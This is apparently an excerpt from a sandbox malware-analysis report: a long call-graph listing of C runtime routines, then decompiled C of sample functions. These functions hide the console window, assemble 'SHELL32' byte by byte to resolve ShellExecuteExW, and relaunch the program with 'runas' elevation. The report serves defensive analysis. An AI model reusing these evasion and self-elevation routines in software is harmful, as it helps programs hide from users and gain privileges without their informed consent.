5341->5349 5351 4059bc 5341->5351 5398 4058c9 5341->5398 5406 405fa5 5341->5406 5344->5341 5409 401b5b 5346->5409 5350 401b5b __cftof_l 68 API calls 5349->5350 5350->5351 5412 40637d 5352->5412 5355 40637d __NMSG_WRITE 69 API calls 5357 403c3c 5355->5357 5356 403a88 __NMSG_WRITE 69 API calls 5358 403c54 5356->5358 5357->5356 5359 403c5e 5357->5359 5360 403a88 __NMSG_WRITE 69 API calls 5358->5360 5359->5336 5360->5359 5362 403a94 5361->5362 5363 40637d __NMSG_WRITE 66 API calls 5362->5363 5394 403bea 5362->5394 5364 403ab4 5363->5364 5365 403bef GetStdHandle 5364->5365 5366 40637d __NMSG_WRITE 66 API calls 5364->5366 5367 403bfd _strlen 5365->5367 5365->5394 5369 403ac5 5366->5369 5370 403c17 WriteFile 5367->5370 5367->5394 5368 403ad7 5368->5394 5431 405fc7 5368->5431 5369->5365 5369->5368 5370->5394 5373 403b0d GetModuleFileNameA 5375 403b2b 5373->5375 5380 403b4e _strlen 5373->5380 5377 405fc7 _strcpy_s 66 API calls 5375->5377 5378 403b3b 5377->5378 5378->5380 5381 402ebf __invoke_watson 10 API calls 5378->5381 5379 403b91 5456 406259 5379->5456 5380->5379 5447 4062ca 5380->5447 5381->5380 5386 403bb5 5388 406259 _strcat_s 66 API calls 5386->5388 5387 402ebf __invoke_watson 10 API calls 5387->5386 5389 403bc6 5388->5389 5391 403bd7 5389->5391 5392 402ebf __invoke_watson 10 API calls 5389->5392 5390 402ebf __invoke_watson 10 API calls 5390->5379 5465 4060bb 5391->5465 5392->5391 5394->5336 5539 4036ac GetModuleHandleA 5395->5539 5399 4058d5 _doexit 5398->5399 5400 405906 _doexit 5399->5400 5543 401d99 5399->5543 5400->5341 5402 4058eb 5550 4025e6 5402->5550 5407 40304b __decode_pointer 5 API calls 5406->5407 5408 405fb0 5407->5408 5408->5341 5673 4031d2 GetLastError 5409->5673 5411 401b60 5411->5349 5413 406388 5412->5413 5414 401b5b __cftof_l 69 API calls 5413->5414 5415 403c2f 5413->5415 5416 4063ab 5414->5416 5415->5355 5415->5357 5419 402fbb 5416->5419 5422 40304b TlsGetValue 5419->5422 5421 402fc9 __invoke_watson 5423 40305e 5422->5423 5424 40307f 
GetModuleHandleA 5422->5424 5423->5424 5425 403068 TlsGetValue 5423->5425 5426 4030a8 5424->5426 5427 40308e GetProcAddress 5424->5427 5429 403073 5425->5429 5426->5421 5428 403077 5427->5428 5428->5426 5430 40309e RtlDecodePointer 5428->5430 5429->5424 5429->5428 5430->5426 5432 405fd4 5431->5432 5435 405fdc 5431->5435 5432->5435 5438 406003 5432->5438 5433 401b5b __cftof_l 69 API calls 5434 405fe1 5433->5434 5436 402fbb __cftof_l 5 API calls 5434->5436 5435->5433 5437 403af9 5436->5437 5437->5373 5440 402ebf 5437->5440 5438->5437 5439 401b5b __cftof_l 69 API calls 5438->5439 5439->5434 5502 402ad0 5440->5502 5442 402f50 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5443 402f93 GetCurrentProcess TerminateProcess 5442->5443 5444 402f87 __invoke_watson 5442->5444 5504 40158c 5443->5504 5444->5443 5446 402fb3 5446->5373 5452 4062da 5447->5452 5448 4062de 5449 401b5b __cftof_l 69 API calls 5448->5449 5450 403b7e 5448->5450 5451 4062fa 5449->5451 5450->5379 5450->5390 5453 402fbb __cftof_l 5 API calls 5451->5453 5452->5448 5452->5450 5454 406324 5452->5454 5453->5450 5454->5450 5455 401b5b __cftof_l 69 API calls 5454->5455 5455->5451 5457 40626e 5456->5457 5460 406266 5456->5460 5458 401b5b __cftof_l 69 API calls 5457->5458 5459 406273 5458->5459 5461 402fbb __cftof_l 5 API calls 5459->5461 5460->5457 5462 4062a3 5460->5462 5463 403ba4 5461->5463 5462->5463 5464 401b5b __cftof_l 69 API calls 5462->5464 5463->5386 5463->5387 5464->5459 5513 403042 5465->5513 5468 40618a 5472 406209 5468->5472 5475 40304b __decode_pointer 5 API calls 5468->5475 5469 4060e3 LoadLibraryA 5470 4060f4 5469->5470 5471 4060fb GetProcAddress 5469->5471 5470->5394 5471->5470 5473 40610d 5471->5473 5477 40304b __decode_pointer 5 API calls 5472->5477 5496 4061ee 5472->5496 5516 402fdf TlsGetValue 5473->5516 5479 4061aa 5475->5479 5476 40304b __decode_pointer 5 API calls 5476->5470 5484 406218 5477->5484 5483 4061d6 5479->5483 5487 40304b __decode_pointer 5 API calls 
5479->5487 5480 402fdf __encode_pointer 5 API calls 5481 406128 GetProcAddress 5480->5481 5482 402fdf __encode_pointer 5 API calls 5481->5482 5486 40613d 5482->5486 5532 403768 5483->5532 5488 40304b __decode_pointer 5 API calls 5484->5488 5484->5496 5525 403731 5486->5525 5491 4061c9 5487->5491 5488->5496 5489 4061df 5493 402ebf __invoke_watson 10 API calls 5489->5493 5489->5496 5491->5472 5491->5483 5492 40614b 5494 40615b 5492->5494 5497 402ebf __invoke_watson 10 API calls 5492->5497 5493->5496 5494->5468 5495 406164 GetProcAddress 5494->5495 5498 402fdf __encode_pointer 5 API calls 5495->5498 5496->5476 5497->5494 5499 406172 5498->5499 5499->5468 5500 40617c GetProcAddress 5499->5500 5501 402fdf __encode_pointer 5 API calls 5500->5501 5501->5468 5503 402adc __VEC_memzero 5502->5503 5503->5442 5505 401594 5504->5505 5506 401596 IsDebuggerPresent 5504->5506 5505->5446 5512 4045bd 5506->5512 5509 401ae7 SetUnhandledExceptionFilter UnhandledExceptionFilter 5510 401b0c GetCurrentProcess TerminateProcess 5509->5510 5511 401b04 __invoke_watson 5509->5511 5510->5446 5511->5510 5512->5509 5514 402fdf __encode_pointer 5 API calls 5513->5514 5515 403049 5514->5515 5515->5468 5515->5469 5517 402ff2 5516->5517 5518 403013 GetModuleHandleA 5516->5518 5517->5518 5519 402ffc TlsGetValue 5517->5519 5520 403022 GetProcAddress 5518->5520 5521 40303c GetProcAddress 5518->5521 5524 403007 5519->5524 5522 40300b 5520->5522 5521->5480 5522->5521 5523 403032 RtlEncodePointer 5522->5523 5523->5521 5524->5518 5524->5522 5526 40373c 5525->5526 5527 403762 5526->5527 5528 401b5b __cftof_l 69 API calls 5526->5528 5527->5492 5529 403741 5528->5529 5530 402fbb __cftof_l 5 API calls 5529->5530 5531 403751 5530->5531 5531->5492 5533 403773 5532->5533 5534 401b5b __cftof_l 69 API calls 5533->5534 5535 403798 5533->5535 5536 403778 5534->5536 5535->5489 5537 402fbb __cftof_l 5 API calls 5536->5537 5538 403788 5537->5538 5538->5489 5540 4036d1 ExitProcess 5539->5540 5541 4036bb GetProcAddress 
5539->5541 5541->5540 5542 4036cb 5541->5542 5542->5540 5544 401dac 5543->5544 5545 401dbf EnterCriticalSection 5543->5545 5559 401cd6 5544->5559 5545->5402 5547 401db2 5547->5545 5585 403688 5547->5585 5553 402612 5550->5553 5551 4026ab 5555 4026b4 5551->5555 5668 402201 5551->5668 5553->5551 5553->5555 5661 402151 5553->5661 5556 40590f 5555->5556 5672 401cc1 LeaveCriticalSection 5556->5672 5558 405916 5558->5400 5560 401ce2 _doexit 5559->5560 5561 401d08 5560->5561 5562 403c28 __FF_MSGBANNER 69 API calls 5560->5562 5567 401d18 _doexit 5561->5567 5592 403512 5561->5592 5563 401cf7 5562->5563 5565 403a88 __NMSG_WRITE 69 API calls 5563->5565 5568 401cfe 5565->5568 5566 401d23 5569 401d39 5566->5569 5570 401d2a 5566->5570 5567->5547 5573 4036d2 _malloc 3 API calls 5568->5573 5572 401d99 __lock 69 API calls 5569->5572 5571 401b5b __cftof_l 69 API calls 5570->5571 5571->5567 5574 401d40 5572->5574 5573->5561 5575 401d74 5574->5575 5576 401d48 5574->5576 5578 40159b __getptd_noexit 69 API calls 5575->5578 5597 4045df 5576->5597 5579 401d65 5578->5579 5623 401d90 5579->5623 5580 401d53 5580->5579 5610 40159b 5580->5610 5583 401d5f 5584 401b5b __cftof_l 69 API calls 5583->5584 5584->5579 5586 403c28 __FF_MSGBANNER 69 API calls 5585->5586 5587 40368d 5586->5587 5588 403a88 __NMSG_WRITE 69 API calls 5587->5588 5589 403696 5588->5589 5590 40304b __decode_pointer 5 API calls 5589->5590 5591 401dbe 5590->5591 5591->5545 5594 403516 5592->5594 5595 40354d 5594->5595 5596 40352e Sleep 5594->5596 5626 405918 5594->5626 5595->5566 5596->5594 5598 4045eb _doexit 5597->5598 5599 40304b __decode_pointer 5 API calls 5598->5599 5600 4045fb 5599->5600 5601 403731 ___crtMessageBoxA 67 API calls 5600->5601 5609 40464f _doexit 5600->5609 5602 40460b 5601->5602 5603 40461a 5602->5603 5604 402ebf __invoke_watson 10 API calls 5602->5604 5605 404623 GetModuleHandleA 5603->5605 5606 404644 5603->5606 5604->5603 5605->5606 5607 404632 GetProcAddress 5605->5607 5608 402fdf __encode_pointer 5 API 
calls 5606->5608 5607->5606 5608->5609 5609->5580 5611 4015a7 _doexit 5610->5611 5612 4015e6 5611->5612 5613 401620 _doexit _realloc 5611->5613 5615 401d99 __lock 67 API calls 5611->5615 5612->5613 5614 4015fb HeapFree 5612->5614 5613->5583 5614->5613 5616 40160d 5614->5616 5619 4015be ___sbh_find_block 5615->5619 5617 401b5b __cftof_l 67 API calls 5616->5617 5618 401612 GetLastError 5617->5618 5618->5613 5620 4015d8 5619->5620 5645 401e3d 5619->5645 5652 4015f1 5620->5652 5660 401cc1 LeaveCriticalSection 5623->5660 5625 401d97 5625->5567 5627 4059c5 5626->5627 5634 405926 5626->5634 5628 405fa5 _malloc 5 API calls 5627->5628 5630 4059cb 5628->5630 5629 40593b 5631 403c28 __FF_MSGBANNER 68 API calls 5629->5631 5629->5634 5636 403a88 __NMSG_WRITE 68 API calls 5629->5636 5638 4036d2 _malloc 3 API calls 5629->5638 5632 401b5b __cftof_l 68 API calls 5630->5632 5631->5629 5633 4059d1 5632->5633 5633->5594 5634->5629 5635 4058c9 _malloc 68 API calls 5634->5635 5637 405989 RtlAllocateHeap 5634->5637 5639 4059b0 5634->5639 5641 405fa5 _malloc 5 API calls 5634->5641 5642 4059ae 5634->5642 5644 4059bc 5634->5644 5635->5634 5636->5629 5637->5634 5638->5629 5640 401b5b __cftof_l 68 API calls 5639->5640 5640->5642 5641->5634 5643 401b5b __cftof_l 68 API calls 5642->5643 5643->5644 5644->5594 5646 401e7a 5645->5646 5651 40211c 5645->5651 5647 402066 VirtualFree 5646->5647 5646->5651 5648 4020ca 5647->5648 5649 4020d9 VirtualFree HeapFree 5648->5649 5648->5651 5655 4046b0 5649->5655 5651->5620 5659 401cc1 LeaveCriticalSection 5652->5659 5654 4015f8 5654->5612 5656 4046c8 5655->5656 5657 4046ef __VEC_memcpy 5656->5657 5658 4046f7 5656->5658 5657->5658 5658->5651 5659->5654 5660->5625 5662 402164 HeapReAlloc 5661->5662 5663 402198 HeapAlloc 5661->5663 5664 402186 5662->5664 5667 402182 5662->5667 5665 4021bb VirtualAlloc 5663->5665 5663->5667 5664->5663 5666 4021d5 HeapFree 5665->5666 5665->5667 5666->5667 5667->5551 5669 402216 VirtualAlloc 5668->5669 5671 40225d 5669->5671 
5671->5555 5672->5558 5688 4030b7 TlsGetValue 5673->5688 5676 4031f5 5677 403249 SetLastError 5676->5677 5693 403552 5676->5693 5677->5411 5680 40304b __decode_pointer 5 API calls 5681 403221 5680->5681 5682 403240 5681->5682 5683 403228 5681->5683 5684 40159b __getptd_noexit 65 API calls 5682->5684 5699 40311e 5683->5699 5686 403246 5684->5686 5686->5677 5687 403230 GetCurrentThreadId 5687->5677 5689 4030e0 TlsGetValue 5688->5689 5690 4030c7 5688->5690 5689->5676 5691 40304b __decode_pointer 5 API calls 5690->5691 5692 4030d2 TlsSetValue 5691->5692 5692->5689 5696 403556 5693->5696 5695 403207 5695->5677 5695->5680 5696->5695 5697 403576 Sleep 5696->5697 5710 4059db 5696->5710 5698 40358b 5697->5698 5698->5695 5698->5696 5727 4028cc 5699->5727 5701 40312a GetModuleHandleA 5702 403170 InterlockedIncrement 5701->5702 5703 40314c GetProcAddress GetProcAddress 5701->5703 5704 401d99 __lock 65 API calls 5702->5704 5703->5702 5705 403197 5704->5705 5728 404ff2 InterlockedIncrement 5705->5728 5707 4031b6 5740 4031c9 5707->5740 5709 4031c3 _doexit 5709->5687 5711 4059e7 _doexit 5710->5711 5712 405a1e _memset 5711->5712 5713 4059ff 5711->5713 5716 405a14 _doexit 5712->5716 5718 405a90 RtlAllocateHeap 5712->5718 5719 405fa5 _malloc 5 API calls 5712->5719 5720 401d99 __lock 68 API calls 5712->5720 5721 4025e6 ___sbh_alloc_block 5 API calls 5712->5721 5723 405ad7 5712->5723 5714 401b5b __cftof_l 68 API calls 5713->5714 5715 405a04 5714->5715 5717 402fbb __cftof_l 5 API calls 5715->5717 5716->5696 5717->5716 5718->5712 5719->5712 5720->5712 5721->5712 5726 401cc1 LeaveCriticalSection 5723->5726 5725 405ade 5725->5712 5726->5725 5727->5701 5729 405010 5728->5729 5730 40500d InterlockedIncrement 5728->5730 5731 40501a InterlockedIncrement 5729->5731 5732 40501d 5729->5732 5730->5729 5731->5732 5733 405027 InterlockedIncrement 5732->5733 5734 40502a 5732->5734 5733->5734 5735 405034 InterlockedIncrement 5734->5735 5737 405037 5734->5737 5735->5737 5736 40504c InterlockedIncrement 
5736->5737 5737->5736 5738 40505c InterlockedIncrement 5737->5738 5739 405065 InterlockedIncrement 5737->5739 5738->5737 5739->5707 5743 401cc1 LeaveCriticalSection 5740->5743 5742 4031d0 5742->5709 5743->5742 7005 407c99 7010 408920 GetModuleHandleA 7005->7010 7008 407caf 7011 40892f GetProcAddress 7010->7011 7012 407c9e 7010->7012 7011->7012 7012->7008 7013 4088bb 7012->7013 7018 408ddf 7013->7018 7015 4088ce 7016 4088df 7015->7016 7017 402ebf __invoke_watson 10 API calls 7015->7017 7016->7008 7017->7016 7019 408df8 __control87 7018->7019 7020 408e21 __control87 7018->7020 7021 401b5b __cftof_l 69 API calls 7019->7021 7020->7015 7022 408e12 7021->7022 7023 402fbb __cftof_l 5 API calls 7022->7023 7023->7020 7024 40889a 7027 408814 7024->7027 7026 4088b6 7028 40887e 7027->7028 7029 40881f 7027->7029 7085 408111 7028->7085 7029->7028 7030 408824 7029->7030 7032 408829 7030->7032 7036 408842 7030->7036 7041 408663 7032->7041 7033 408863 7033->7026 7035 408865 7072 4081fd 7035->7072 7036->7035 7038 40884c 7036->7038 7055 40871c 7038->7055 7099 408c51 7041->7099 7044 40869b 7045 401b5b __cftof_l 69 API calls 7044->7045 7047 4086a0 7045->7047 7046 4086ba 7109 408ad9 7046->7109 7048 402fbb __cftof_l 5 API calls 7047->7048 7054 4086ac 7048->7054 7051 40158c __cftof_l 5 API calls 7053 40871a 7051->7053 7053->7026 7054->7051 7056 408c51 __fltout2 69 API calls 7055->7056 7057 40874b 7056->7057 7058 408754 7057->7058 7060 408776 7057->7060 7059 401b5b __cftof_l 69 API calls 7058->7059 7061 408759 7059->7061 7063 408ad9 __fptostr 69 API calls 7060->7063 7062 402fbb __cftof_l 5 API calls 7061->7062 7070 408765 7062->7070 7067 4087a2 7063->7067 7064 40158c __cftof_l 5 API calls 7065 408812 7064->7065 7065->7033 7066 4087e9 7153 407fa4 7066->7153 7067->7066 7069 4087c1 7067->7069 7067->7070 7071 40856e __cftof2_l 79 API calls 7069->7071 7070->7064 7071->7070 7073 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 7072->7073 7074 408220 7073->7074 7075 40822f 7074->7075 7076 40825f 
7074->7076 7077 401b5b __cftof_l 69 API calls 7075->7077 7078 40826d 7076->7078 7082 408276 7076->7082 7079 408234 7077->7079 7080 401b5b __cftof_l 69 API calls 7078->7080 7081 402fbb __cftof_l 5 API calls 7079->7081 7080->7079 7084 408243 _memset __alldvrm __cftoa_l _strrchr 7081->7084 7082->7084 7172 4081df 7082->7172 7084->7033 7086 408c51 __fltout2 69 API calls 7085->7086 7087 408140 7086->7087 7088 408149 7087->7088 7090 408168 7087->7090 7089 401b5b __cftof_l 69 API calls 7088->7089 7091 40814e 7089->7091 7093 408ad9 __fptostr 69 API calls 7090->7093 7092 402fbb __cftof_l 5 API calls 7091->7092 7094 40815a 7092->7094 7095 4081ac 7093->7095 7096 40158c __cftof_l 5 API calls 7094->7096 7095->7094 7097 407fa4 __cftoe2_l 79 API calls 7095->7097 7098 4081dd 7096->7098 7097->7094 7098->7033 7100 408c7a ___dtold 7099->7100 7135 409f91 7100->7135 7103 405fc7 _strcpy_s 69 API calls 7104 408cb5 7103->7104 7105 408cc8 7104->7105 7107 402ebf __invoke_watson 10 API calls 7104->7107 7106 40158c __cftof_l 5 API calls 7105->7106 7108 408692 7106->7108 7107->7105 7108->7044 7108->7046 7110 408b0c 7109->7110 7111 408aee 7109->7111 7110->7111 7112 408b11 7110->7112 7113 401b5b __cftof_l 69 API calls 7111->7113 7115 408b26 7112->7115 7119 408b34 _strlen 7112->7119 7114 408af3 7113->7114 7116 402fbb __cftof_l 5 API calls 7114->7116 7117 401b5b __cftof_l 69 API calls 7115->7117 7118 4086ed 7116->7118 7117->7114 7118->7054 7121 40856e 7118->7121 7119->7118 7120 4046b0 __cftoe2_l __VEC_memcpy 7119->7120 7120->7118 7122 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 7121->7122 7123 40858a 7122->7123 7124 40858e 7123->7124 7125 4085c1 7123->7125 7126 401b5b __cftof_l 69 API calls 7124->7126 7129 4085fd 7125->7129 7149 407f6b 7125->7149 7127 408593 7126->7127 7128 402fbb __cftof_l 5 API calls 7127->7128 7134 4085a4 _memset 7128->7134 7131 407f6b __shift __VEC_memcpy 7129->7131 7129->7134 7132 408612 7131->7132 7133 407f6b __shift __VEC_memcpy 7132->7133 7132->7134 7133->7134 
7134->7054 7139 40a005 7135->7139 7136 40a06d 7140 405fc7 _strcpy_s 69 API calls 7136->7140 7137 40158c __cftof_l 5 API calls 7138 408c95 7137->7138 7138->7103 7139->7136 7141 40a085 7139->7141 7148 40a022 7139->7148 7142 40a0d0 7140->7142 7143 405fc7 _strcpy_s 69 API calls 7141->7143 7144 402ebf __invoke_watson 10 API calls 7142->7144 7142->7148 7145 40a0a4 7143->7145 7144->7148 7146 402ebf __invoke_watson 10 API calls 7145->7146 7145->7148 7146->7148 7147 40a831 7148->7137 7148->7147 7150 407f72 _strlen 7149->7150 7151 407f83 7149->7151 7152 4046b0 __cftoe2_l __VEC_memcpy 7150->7152 7151->7129 7152->7151 7154 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 7153->7154 7155 407fba 7154->7155 7156 407fc0 7155->7156 7157 407ff0 7155->7157 7158 401b5b __cftof_l 69 API calls 7156->7158 7160 408004 7157->7160 7161 40800d 7157->7161 7159 407fc5 7158->7159 7162 402fbb __cftof_l 5 API calls 7159->7162 7163 401b5b __cftof_l 69 API calls 7160->7163 7164 408031 7161->7164 7166 407f6b __shift __VEC_memcpy 7161->7166 7165 407fd4 7162->7165 7163->7159 7167 405fc7 _strcpy_s 69 API calls 7164->7167 7165->7070 7166->7164 7168 408088 7167->7168 7169 402ebf __invoke_watson 10 API calls 7168->7169 7170 40809b 7168->7170 7169->7170 7170->7165 7171 4046b0 __cftoe2_l __VEC_memcpy 7170->7171 7171->7165 7173 408111 __cftoe_l 79 API calls 7172->7173 7174 4081f8 7173->7174 7174->7084 6699 407d5c 6700 407d95 6699->6700 6703 407d6b 6699->6703 6701 407daa __CxxUnhandledExceptionFilter 6700->6701 6702 40304b __decode_pointer 5 API calls 6700->6702 6702->6701 6703->6700 6705 405d33 6703->6705 6706 405d3f _doexit 6705->6706 6707 403255 _LocaleUpdate::_LocaleUpdate 69 API calls 6706->6707 6710 405d44 6707->6710 6708 406f1e _abort 95 API calls 6709 405d66 _doexit 6708->6709 6709->6700 6710->6708 6850 4017dc 6853 4017ce 6850->6853 6852 4017e4 ctype 6856 403990 6853->6856 6855 4017da 6855->6852 6857 40399c _doexit 6856->6857 6858 401d99 __lock 69 API calls 6857->6858 6861 4039a3 6858->6861 6859 
4039dc 6866 4039f7 6859->6866 6861->6859 6862 4039d3 6861->6862 6865 40159b __getptd_noexit 69 API calls 6861->6865 6864 40159b __getptd_noexit 69 API calls 6862->6864 6863 4039ed _doexit 6863->6855 6864->6859 6865->6862 6869 401cc1 LeaveCriticalSection 6866->6869 6868 4039fe 6868->6863 6869->6868 5744 40185d 5787 4028cc 5744->5787 5746 401869 GetProcessHeap HeapAlloc 5747 401886 5746->5747 5748 401898 GetVersionExA 5746->5748 5932 4017f8 5747->5932 5750 4018b3 GetProcessHeap HeapFree 5748->5750 5751 4018a8 GetProcessHeap HeapFree 5748->5751 5752 4018df 5750->5752 5786 40188d _doexit 5751->5786 5788 401bc9 HeapCreate 5752->5788 5754 40191e 5755 40192a 5754->5755 5756 4017f8 _fast_error_exit 69 API calls 5754->5756 5798 40338e GetModuleHandleA 5755->5798 5756->5755 5758 401930 5759 40193b __RTC_Initialize 5758->5759 5760 4017f8 _fast_error_exit 69 API calls 5758->5760 5831 4042a1 5759->5831 5760->5759 5762 40194a 5763 401955 5762->5763 5764 403688 __amsg_exit 69 API calls 5762->5764 5848 404202 5763->5848 5764->5763 5771 40197a 5894 403dd0 5771->5894 5773 403688 __amsg_exit 69 API calls 5773->5771 5775 40198b 5907 4037a4 5775->5907 5776 403688 __amsg_exit 69 API calls 5776->5775 5778 401993 5779 40199e 5778->5779 5780 403688 __amsg_exit 69 API calls 5778->5780 5916 40bc10 FindWindowA 5779->5916 5780->5779 5783 4019cd 5940 403926 5783->5940 5787->5746 5789 401be9 5788->5789 5790 401bec 5788->5790 5789->5754 5943 401b6e 5790->5943 5793 401bfb 5952 401dca HeapAlloc 5793->5952 5794 401c1f 5794->5754 5797 401c0a HeapDestroy 5797->5789 5799 4033a0 5798->5799 5800 4033a9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5798->5800 5954 4030e1 5799->5954 5802 4033f3 TlsAlloc 5800->5802 5805 403441 TlsSetValue 5802->5805 5806 40350d 5802->5806 5805->5806 5807 403452 5805->5807 5806->5758 5960 403944 5807->5960 5810 402fdf __encode_pointer 5 API calls 5811 403462 5810->5811 5812 402fdf __encode_pointer 5 API calls 5811->5812 5813 403472 5812->5813 5814 402fdf 

                                                            Control-flow Graph

                                                            C-Code - Quality: 91%
                                                            			E0040AF60(void* __ebx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                            				struct _SHELLEXECUTEINFOW _v64;
                                                            				signed int _v68;
                                                            				char _v69;
                                                            				char _v70;
                                                            				char _v71;
                                                            				char _v72;
                                                            				char _v73;
                                                            				char _v74;
                                                            				char _v75;
                                                            				char _v76;
                                                            				_Unknown_base(*)()* _v80;
                                                            				signed int _t25;
                                                            				struct HINSTANCE__* _t28;
                                                            				void* _t40;
                                                            				signed int _t42;
                                                            
                                                            				_t25 =  *0x40f020; // 0xebf16b9c
                                                            				_v68 = _t25 ^ _t42;
                                                            				_v76 = 0x53;
                                                            				_v75 = 0x48;
                                                            				_v74 = 0x45;
                                                            				_v73 = 0x4c;
                                                            				_v72 = 0x4c;
                                                            				_v71 = 0x33;
                                                            				_v70 = 0x32;
                                                            				_v69 = 0;
                                                            				_t10 =  &_v76; // 0x53
                                                            				_t28 = LoadLibraryA(_t10); // executed
                                                            				_v80 = GetProcAddress(_t28, "ShellExecuteExW");
                                                            				_v64.cbSize = 0;
                                                            				E00402AD0(_t40,  &(_v64.fMask), 0, 0x38);
                                                            				_v64.cbSize = 0x3c;
                                                            				_v64.fMask = 0x440;
                                                            				_v64.lpParameters = _a8;
                                                            				_v64.nShow = 1;
                                                            				_v64.lpFile = _a4;
                                                            				_v64.lpVerb = L"runas";
                                                            				return E0040158C(ShellExecuteExW( &_v64), __ebx, _v68 ^ _t42, _a8, _t40, __esi);
                                                            			}


                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(SHELL32,ShellExecuteExW), ref: 0040AF99
                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040AFA0
                                                            • _memset.LIBCMT ref: 0040AFB8
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0040AFEC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressExecuteLibraryLoadProcShell_memset
                                                            • String ID: <$H$SHELL32$ShellExecuteExW
                                                            • API String ID: 729207603-281526968
                                                            • Opcode ID: 8ef38e38124d7f473b8f99363df40fe12ea4f623e51a9652085ebf00db1b050d
                                                            • Instruction ID: ea46c510b610b00ffe8adee838eb9b268168c7108b345ae6be4005dd780da530
                                                            • Opcode Fuzzy Hash: 8ef38e38124d7f473b8f99363df40fe12ea4f623e51a9652085ebf00db1b050d
                                                            • Instruction Fuzzy Hash: 01115BB0C04348DADB61CFE4D848BCDBFB4AF18308F044159E9087B281DBB9554ACB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 78%
                                                            			E0040BC10(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				char* _v28;
                                                            				struct HWND__* _v32;
                                                            				signed int _v36;
                                                            				char _v556;
                                                            				intOrPtr _v560;
                                                            				signed int _t21;
                                                            				struct HWND__* _t24;
                                                            				void* _t29;
                                                            				intOrPtr _t31;
                                                            				void* _t34;
                                                            				intOrPtr _t35;
                                                            				intOrPtr _t42;
                                                            				intOrPtr _t43;
                                                            				signed int _t44;
                                                            				void* _t45;
                                                            				void* _t46;
                                                            
                                                            				_t43 = __esi;
                                                            				_t42 = __edi;
                                                            				_t35 = __ebx;
                                                            				_t21 =  *0x40f020; // 0xebf16b9c
                                                            				_v36 = _t21 ^ _t44;
                                                            				_v24 = 0x736e6f43;
                                                            				_v20 = 0x57656c6f;
                                                            				_v16 = 0x6f646e69;
                                                            				_v12 = 0x616c4377;
                                                            				_v8 = 0x7373;
                                                            				_t7 =  &_v24; // 0x736e6f43
                                                            				_t24 = FindWindowA(_t7, 0); // executed
                                                            				_v32 = _t24;
                                                            				E0040B170(_v32); // executed
                                                            				_t46 = _t45 + 4;
                                                            				_v28 = L"-h";
                                                            				if(_a4 < 2) {
                                                            					L2:
                                                            					_v560 = E0040B230();
                                                            					_t41 =  &_v556;
                                                            					_v560(0,  &_v556, 0x208);
                                                            					_t29 = E0040AF60(_t35, _t43, _t49,  &_v556, _v28); // executed
                                                            					if(_t29 == 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						_t31 = 0;
                                                            					}
                                                            				} else {
                                                            					_t41 = _v28;
                                                            					_t34 = E0040B000( *((intOrPtr*)(_a8 + 4)), _v28);
                                                            					_t46 = _t46 + 8;
                                                            					_t49 = _t34;
                                                            					if(_t34 != 0) {
                                                            						L4:
                                                            						E0040BA50(_t35, _t42, _t43);
                                                            						_t31 = 0;
                                                            						__eflags = 0;
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            				return E0040158C(_t31, _t35, _v36 ^ _t44, _t41, _t42, _t43);
                                                            			}


                                                            APIs
                                                            • FindWindowA.USER32 ref: 0040BC4C
                                                              • Part of subcall function 0040B170: GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 0040B195
                                                            • _wcsstr.LIBCMTD ref: 0040BC79
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressFindProcWindow_wcsstr
                                                            • String ID: ConsoleWindowClass
                                                            • API String ID: 1746155897-1331846550
                                                            • Opcode ID: 8a6c043029350c012949b2761951153b33feee4be2a24f493eedabaa1a1acd61
                                                            • Instruction ID: 059aed936bd4f7953ff50b647851c6ffa27fd3c0a4feb35440658e11611d5d8c
                                                            • Opcode Fuzzy Hash: 8a6c043029350c012949b2761951153b33feee4be2a24f493eedabaa1a1acd61
                                                            • Instruction Fuzzy Hash: 0B1160B0D00208ABDB10DFE1D946AAEB7B4EF08304F00816EE905B7281DB389604CFE9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic blocks: address range, notable calls; edges)

                                                            • 24: 40b130-40b167, LoadLibraryA, call 40158c; 24->26
                                                            • 26: 40b16c-40b16f
                                                            C-Code - Quality: 84%
                                                            			E0040B130() {
                                                            				signed int _v8;
                                                            				char _v11;
                                                            				char _v12;
                                                            				char _v13;
